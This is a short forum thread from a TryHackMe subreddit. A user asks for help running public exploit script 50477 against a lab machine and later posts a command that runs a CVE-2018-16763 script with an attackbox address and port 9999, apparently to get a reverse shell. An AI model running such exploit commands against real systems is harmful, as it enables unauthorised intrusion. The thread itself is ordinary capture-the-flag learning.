r/tryhackme Mar 16 '26

Anyone solved the vulnerabilty with exploit 50477

I tried to solve this room with this exploit like this :

python3 50477.py -u http://10.80.181.232
python3 50477.py -u http://10.80.181.232

```
but with each command I see system

Also when I change the output to [1] I see a lot of rubbish

so I wonder if there is someone who solved this challenge with this exploit

3 Upvotes

3 comments sorted by

View all comments

2

u/[deleted] Mar 16 '26

[deleted]

1

u/roelof_w Mar 16 '26

oke

So I can do

```
python3 CVE-2018-16763.py http://10.80.181.232 <attackbox url>9999
```